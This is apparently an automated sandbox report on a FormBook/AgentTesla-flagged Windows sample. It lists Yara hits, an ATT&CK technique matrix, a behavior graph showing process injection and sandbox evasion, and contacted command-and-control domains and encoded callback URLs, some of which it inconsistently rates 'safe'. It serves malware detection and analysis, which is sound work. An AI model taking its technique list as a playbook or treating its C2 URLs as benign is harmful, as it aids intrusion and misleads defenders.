            Source: Yara matchFile source: 00000001.00000002.272011723.0000000001580000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.503167127.0000000000E00000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.505106609.0000000004AF0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE

            Remote Access Functionality:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000001.00000002.272036979.00000000015B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.271729564.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.242174585.0000000003AC9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.504019492.0000000001140000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.272011723.0000000001580000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.503167127.0000000000E00000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.505106609.0000000004AF0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsShared Modules1Path InterceptionProcess Injection812Rootkit1Credential API Hooking1Security Software Discovery221Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1Input Capture1Virtualization/Sandbox Evasion3Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion3Security Account ManagerProcess Discovery2SMB/Windows Admin SharesArchive Collected Data1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Disable or Modify Tools1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection812LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing3Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 321296 Sample: vOKMFxiCYt.exe Startdate: 20/11/2020 Architecture: WINDOWS Score: 100 36 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->36 38 Malicious sample detected (through community Yara rule) 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 5 other signatures 2->42 10 vOKMFxiCYt.exe 3 2->10         started        process3 file4 28 C:\Users\user\AppData\...\vOKMFxiCYt.exe.log, ASCII 10->28 dropped 52 Writes to foreign memory regions 10->52 54 Allocates memory in foreign processes 10->54 56 Injects a PE file into a foreign processes 10->56 14 RegSvcs.exe 10->14         started        signatures5 process6 signatures7 58 Modifies the context of a thread in another process (thread injection) 14->58 60 Maps a DLL or memory area into another process 14->60 62 Sample uses process hollowing technique 14->62 64 2 other signatures 14->64 17 explorer.exe 14->17 injected process8 dnsIp9 30 auctionpros.club 162.0.232.118, 49741, 80 NAMECHEAP-NETUS Canada 17->30 32 reem.pro 34.102.136.180, 49737, 80 GOOGLEUS United States 17->32 34 6 other IPs or domains 17->34 44 System process connects to network (likely due to code injection or exploit) 17->44 21 raserver.exe 17->21         started        signatures10 process11 signatures12 46 Modifies the context of a thread in another process (thread injection) 21->46 48 Maps a DLL or memory area into another process 21->48 50 Tries to detect virtualization through RDTSC time measurements 21->50 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            vOKMFxiCYt.exe35%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
            vOKMFxiCYt.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            1.2.RegSvcs.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.reem.pro/glt/?V4=MLpAZ0AK/spUlt1gTLvrDwTqfxMoBLVQzrzuTOkSqlsdFHJLAwBY2ZzU1xSBGMRzyeG8&SP=cnxhAdAh0%Avira URL Cloudsafe
            http://www.auctionpros.club/glt/?V4=hWCSv9Zrwql4NKRqpOYz8tuCeFQ4j+1tRbbWxD4HfruMRkMSYBHm3MJuhB2jB30ChDel&SP=cnxhAdAh0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.tessuto.net/glt/?SP=cnxhAdAh&V4=RXCBf+kTtqMKofvvq54zDDgrcqehmcxCBUCamp/3E7fzZOB7U/XBgSeZZ5TRQ//94zw40%Avira URL Cloudsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.themaskedstitcher.com/glt/?SP=cnxhAdAh&V4=oeIisVoovR5GVMPXvvkWG2hSa0zFuUbByopAkVC9hBB+Ndji49czoVDBLaeM7MDZ9TnP0%Avira URL Cloudsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com
            		3.138.72.189
            		truefalse
              		high
              reem.pro
              		34.102.136.180
              		truetrue
                		unknown
                auctionpros.club
                		162.0.232.118
                		truetrue
                  		unknown
                  ext-cust.squarespace.com
                  		198.49.23.141
                  		truefalse
                    		high
                    www.themaskedstitcher.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.auctionpros.club
                      		unknown
                      		unknowntrue
                        		unknown
                        www.reem.pro
                        		unknown
                        		unknowntrue
                          		unknown
                          www.tessuto.net
                          		unknown
                          		unknowntrue
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://www.reem.pro/glt/?V4=MLpAZ0AK/spUlt1gTLvrDwTqfxMoBLVQzrzuTOkSqlsdFHJLAwBY2ZzU1xSBGMRzyeG8&SP=cnxhAdAhtrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.auctionpros.club/glt/?V4=hWCSv9Zrwql4NKRqpOYz8tuCeFQ4j+1tRbbWxD4HfruMRkMSYBHm3MJuhB2jB30ChDel&SP=cnxhAdAhtrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.tessuto.net/glt/?SP=cnxhAdAh&V4=RXCBf+kTtqMKofvvq54zDDgrcqehmcxCBUCamp/3E7fzZOB7U/XBgSeZZ5TRQ//94zw4true
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.themaskedstitcher.com/glt/?SP=cnxhAdAh&V4=oeIisVoovR5GVMPXvvkWG2hSa0zFuUbByopAkVC9hBB+Ndji49czoVDBLaeM7MDZ9TnPtrue
                            • Avira URL Cloud: safe
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpfalse
                              		high
                              http://www.fontbureau.comexplorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpfalse
                                		high
                                http://www.fontbureau.com/designersGexplorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.fontbureau.com/designers/?explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.founder.com.cn/cn/bTheexplorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers?explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.tiro.comexplorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designersexplorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpfalse
                                        		high
                                        http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=raserver.exe, 00000004.00000002.506812727.000000000574F000.00000004.00000001.sdmpfalse
                                          		high
                                          http://www.goodfont.co.krexplorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.carterandcone.comlexplorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.sajatypeworks.comexplorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.typography.netDexplorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpfalse
                                            		high
                                            http://www.founder.com.cn/cn/cTheexplorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://fontfabrik.comexplorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.founder.com.cn/cnexplorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpfalse
                                              		high
                                              http://www.jiyu-kobo.co.jp/explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.com/designers8explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpfalse
                                                		high
                                                http://www.fonts.comexplorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpfalse
                                                  		high
                                                  http://www.sandoll.co.krexplorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.urwpp.deDPleaseexplorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.zhongyicts.com.cnexplorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namevOKMFxiCYt.exe, 00000000.00000002.241858795.0000000002AC1000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://www.sakkal.comexplorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown

                                                    Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    198.49.23.141
                                                    		unknownUnited States
                                                    		53831SQUARESPACEUSfalse
                                                    162.0.232.118
                                                    		unknownCanada
                                                    		22612NAMECHEAP-NETUStrue
                                                    34.102.136.180
                                                    		unknownUnited States
                                                    		15169GOOGLEUStrue
                                                    3.138.72.189
                                                    		unknownUnited States
                                                    		16509AMAZON-02USfalse

                                                    General Information

                                                    Joe Sandbox Version:31.0.0 Red Diamond
                                                    Analysis ID:321296
                                                    Start date:20.11.2020
                                                    Start time:20:03:25
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 10m 17s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Sample file name:vOKMFxiCYt.exe
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                    Number of analysed new started processes analysed:24
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:1
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal100.troj.evad.winEXE@7/1@4/4
                                                    EGA Information:Failed
                                                    HDC Information:
                                                    • Successful, ratio: 32.2% (good quality ratio 29.2%)
                                                    • Quality average: 72.4%
                                                    • Quality standard deviation: 31.5%
                                                    HCA Information:
                                                    • Successful, ratio: 100%
                                                    • Number of executed functions: 78
                                                    • Number of non-executed functions: 151
                                                    Cookbook Comments:
                                                    • Adjust boot time
                                                    • Enable AMSI
                                                    • Found application associated with file extension: .exe
                                                    Warnings:
                                                    Show All
                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                    • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 104.43.139.144, 13.88.21.125, 168.61.161.212, 2.18.68.82, 51.104.139.180, 20.54.26.129, 8.241.121.126, 8.253.95.120, 8.241.121.254, 8.241.11.254, 8.248.115.254, 92.122.213.247, 92.122.213.194, 51.132.208.181
                                                    • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, db3p-ris-pf-prod-atm.trafficmanager.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, ris.api.iris.microsoft.com, umwatsonrouting.trafficmanager.net, a-0001.a-afdentry.net.trafficmanager.net, skypedataprdcolwus15.cloudapp.net
                                                    • VT rate limit hit for: /opt/package/joesandbox/database/analysis/321296/sample/vOKMFxiCYt.exe

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    20:04:29API Interceptor1x Sleep call for process: vOKMFxiCYt.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    198.49.23.141BANK ACCOUNT INFO!.exeGet hashmaliciousBrowse
                                                    • www.katrinarask.com/sbmh/?FPWlMXx=W647QVGGXcyuIQJd2YRsV4l3KrBdlR6nE0kWwxhnTOMt1o1EWv0jVtfUgI2cf5E+EjKE&AlO=O2JtmTIX2
                                                    Payment Advice - Advice Ref GLV823990339.exeGet hashmaliciousBrowse
                                                    • www.floresereis.com/gyo3/?Ez=PS6J2QmalNJ2YJDjbe69AvUeFdUcpOy/3pEgziSDPBkUWsWS6mOmijOfudAWg7zfBEC1B5r2MQ==&lhud=TjfdU2S
                                                    http://f69e.engage.squarespace-mail.comGet hashmaliciousBrowse
                                                    • f69e.engage.squarespace-mail.com/
                                                    dB7XQuemMc.exeGet hashmaliciousBrowse
                                                    • www.missteenroyaluniverse.com/nt8e/?wfv=ZReo2Pt2Qe1/UCtjKFtXHq3RWUOi2Gm/wCbn0tZxqkEIYA02TnYAkFkYrty+KIrZCZ6r&Tj=yrIt
                                                    hRVrTsMv25.exeGet hashmaliciousBrowse
                                                    • www.qlifepharmacy.com/hko6/?XVJpkDH8=GNi/DpI/o0IU2mlIts+MFBAG9T0dMGL590B2ep5La5xhQGCr0BB5YDI5YioaKEegNoVx&V8-DC=02JL1VL0CDLPLTE0
                                                    NzI1oP5E74.exeGet hashmaliciousBrowse
                                                    • www.kayapallisgaard.com/igqu/?v6=+FdV/Kd4fGUiBuWYNlWEm7YK8cxavEbtySDgdYvfxIiidE6desXWnlu2B7HA/iyauFln7ZyoAg==&1b=V6O83JaPw
                                                    PO.exeGet hashmaliciousBrowse
                                                    • www.unusualdawg.com/9d1o/?1bm=QkXoOVVmg24y7wxEBap6bO8f6UGaNui7YjNJ7V3V8x8CyLlwzZoXh9kyUu+YoqOVbj3TZFChrA==&sZRd=pBiHDjuxCVPXGhYp
                                                    KZ7qjnBlZF.exeGet hashmaliciousBrowse
                                                    • www.haloheartdachshunds.com/sub/?ndndn4=RVlTij&AR5=XFWzbX0ToqWBjEsf26ufL7Xq5jBuxaIMiFZhysx3UIjI7XvmT/Bu5040hGTugKhDCWzPxOW3Cg==
                                                    34.102.136.180Order List.xlsxGet hashmaliciousBrowse
                                                    • www.crimson.school/o56q/?sFNp=jpX0Lfi0J&mL0=9OrW47TrMTZH15Vmzbe9TQM6sSr1xjl4p0LLri3wKcTyHbeStzlrAaSeWLbT0hv9vCeuEg==
                                                    Purchase Order 40,7045$.exeGet hashmaliciousBrowse
                                                    • www.searchnehomes.com/igqu/?7nExDDz=HPW2WyZF3+vAEuPCsfs94a0V0pGSpSCTGdq4luVMg5IcQk4WROkoYp4gl4PZZku0mN/660XlTQ==&znedzJ=zZ08lr
                                                    invoice.exeGet hashmaliciousBrowse
                                                    • www.laborexchanges.com/saf0/?UnSpxn_=BtLohM+uB3q4k/LlKf4h6h9jKhMOWhQYAUT20pwPFuxXeQimTiRkUGHppPy1CbtFE5UV&nHux40=pRmTZBcPIFQHkvP0
                                                    TR-D45.pdf.exeGet hashmaliciousBrowse
                                                    • www.gcvinternational.com/gnu/?bly=TVIpcz004Rkd&X2MxIjJP=i4YBL42YhvK+usDHzss6Tj24XYATFEIvS7y0nzG29ZgEeNh3uLyKqQDd2VWk30ZHQtTi
                                                    86dXpRWnFG.exeGet hashmaliciousBrowse
                                                    • www.powderedsilk.com/ogg/?FdtP=yL0l42d8z4u&JfspOLvH=fOCM8bU6nldV/iwSncfaF5Bzy/lGPGgo/g5DGIZRlu3EMk3UROnm6TGL4YPAlMSLjacD
                                                    LIST OF PRODUCTS NEEDED.exeGet hashmaliciousBrowse
                                                    • www.present-motherhood.com/pna/?oXN=7nbLudZHS&wP9=pAJh36KDGKuozQ+wlnL4iaUZacIoIbb12I26NWSsGNXaprJ2jX+VR1VHCYeoOV3CYcpo
                                                    Order specs19.11.20.exeGet hashmaliciousBrowse
                                                    • www.overstockalpine.com/nwrr/?cj=Nc1MB4yErYgRagn/HzK3hScSsYEBegMtx+kEQv9TefYD7E7OGiE02SCDOI6eM3Hv09tUJ3eV9Q==&Rxo=L6hH4NIhfjzT
                                                    Okwt8fW5KH.exeGet hashmaliciousBrowse
                                                    • www.mybriefbox.com/sdk/?AP=KzrxE&kzut2Pv=ieC5SQ4WTCMGwLwKeHkkTkUTO60lnbNinIRTqFa5Tgq0ajZ12E69OSpNqOiQRcX/surf
                                                    Purchase Order 40,7045.exeGet hashmaliciousBrowse
                                                    • www.onlineshoppingisbest.com/igqu/?YnztXrjp=cAw+48JGWTFWiF+zD75YoKcSRGv0/cbX2CyjAL3BYh15xmcIYagPiXPUr4/0BC838prH&sBZxwb=FxlXFP2PHdiD2
                                                    Payment Advice - Advice Ref GLV823990339.exeGet hashmaliciousBrowse
                                                    • www.brilliance-automation.com/gyo3/?Ez=XAbIWkmCD7FprhBGM/1VWQtkWKjPoo+hixDnJGBEsGUo9CkrVpkcDmC1vi0ujf808Qfd1id09g==&lhud=TjfdU2S
                                                    Purchase Order 40,7045$.exeGet hashmaliciousBrowse
                                                    • www.rockinglifefromhome.com/igqu/?afo=42cTP78OQQp4lToQAaTApkvzdS7tu3b97V7Z9hUZNPZ7GHRvcEVBBFWfORGuicEzVgEw0Hp6jQ==&DHU4SX=gbT8543hIhm
                                                    MV.KMTC JEBEL ALI_pdf.exeGet hashmaliciousBrowse
                                                    • www.mereziboutique.com/y9z/?uFQl=hX/JgwGUf2blPgyiHp8pkr0UcN4JhiEs10p3+69z9DK69Gln3SJoRK9DZHZ4ze7gp3+f&CTvp=fv10_lYhrxJtW6
                                                    SWIFT_HSBC Bank.exeGet hashmaliciousBrowse
                                                    • www.homewellliving.com/nt8e/?7nwltvxh=y2sdQ9Xb5ECC4UyPumlTTMs33wxYtaLvB/dO1hyuc+aLkGir7cEA1isigJn19hEFQwDS&org=3foxnfCXOnIhKD
                                                    23692 ANRITSU PROBE po 29288.exeGet hashmaliciousBrowse
                                                    • www.funeralfermentarium.com/9d1o/?lvH8U=Wears+I1XvB+Lmut0rGzY9wAFTAHH41k5OVIheQSGxmq0oO+QWZXKPOXziEsAnWJSQrEFn+Exw==&E6A=8pDxC4
                                                    PO0119-1620 LQSB 0320 Siemens.exeGet hashmaliciousBrowse
                                                    • www.guillermoastiazaran.com/sppe/?DnadT=x+bcW4Gq4Sa+8Fw3ruRe02HfSBDGbo9y1yLk6wxIyT1lxw5Q+sxUrgb1tDfRR28VG68C&DxlLi=2dmX
                                                    KYC_DOC_.EXEGet hashmaliciousBrowse
                                                    • www.packorganically.com/bw82/?CXrL=77CCBBr2/49gWL5yauZnKqdCED7z+VtJXat/kGRZ6Qnjpe6WQ1Ax9xdsmUB8H+4disGx&llvxw=fTAlUHeHDVNhYV
                                                    PO0119-1620 LQSB 0320 Siemens.exeGet hashmaliciousBrowse
                                                    • www.bullwingsgt.com/sppe/?00D=NB3Dd/vOM6aQ3m0lcddBYOe/MXAC8Z/KQ2ZGmCsq6hDofgl0Po6pPua8TNWmH6LR2TRn&w48H=qBZ83x7XYlyP0lo0
                                                    ant.exeGet hashmaliciousBrowse
                                                    • www.spidermenroofsupport.com/94sb/?8pMt5xHX=C9biJKOafB1QzsexO7xJmKpRIYJMQj6VpKItH4wgGF+KF++s1hKyu2EaSVFJqiHWuFvG&GzrT=Wb1LdRq8x
                                                    PROOF OF PAYMENT.exeGet hashmaliciousBrowse
                                                    • www.prideaffiliate.com/mua8/?w48t=0pY022IXUBwLfpfP&nflpdH=Vm4JrPClk0aQj+jhcdONVb3zc5GtcUOmsZyrOc+k5NW+jXUcqcFsSwfT9cazrXQd7qcZ
                                                    DEBIT NOTE DB-1130.exeGet hashmaliciousBrowse
                                                    • www.knotgardenlifestylings.com/ihm3/?sBZ4lrK=PS39z8PEw7TzfNOCiLKd1OXoS8/GfzxzB5O+ulo0NmPTjwXimFWvt/sJkvH86VVEya1bUCOS1g==&FPcT7b=djCDfFRXOP7H

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    ext-cust.squarespace.comPayment Advice - Advice Ref GLV823990339.exeGet hashmaliciousBrowse
                                                    • 198.49.23.141
                                                    NEW PO.exeGet hashmaliciousBrowse
                                                    • 198.185.159.141
                                                    Quotation.exeGet hashmaliciousBrowse
                                                    • 198.185.159.145
                                                    PO#646756575646.exeGet hashmaliciousBrowse
                                                    • 198.49.23.145
                                                    PO#646756575646.exeGet hashmaliciousBrowse
                                                    • 198.185.159.145
                                                    PO8479349743085.exeGet hashmaliciousBrowse
                                                    • 198.185.159.144
                                                    PO8479349743085.exeGet hashmaliciousBrowse
                                                    • 198.185.159.145
                                                    PO8479349743085.exeGet hashmaliciousBrowse
                                                    • 198.49.23.144
                                                    vSCyL8NNIC.exeGet hashmaliciousBrowse
                                                    • 198.185.159.145
                                                    plusnew.exeGet hashmaliciousBrowse
                                                    • 198.49.23.144
                                                    Shipping Documents.exeGet hashmaliciousBrowse
                                                    • 198.185.159.145
                                                    invoice.exeGet hashmaliciousBrowse
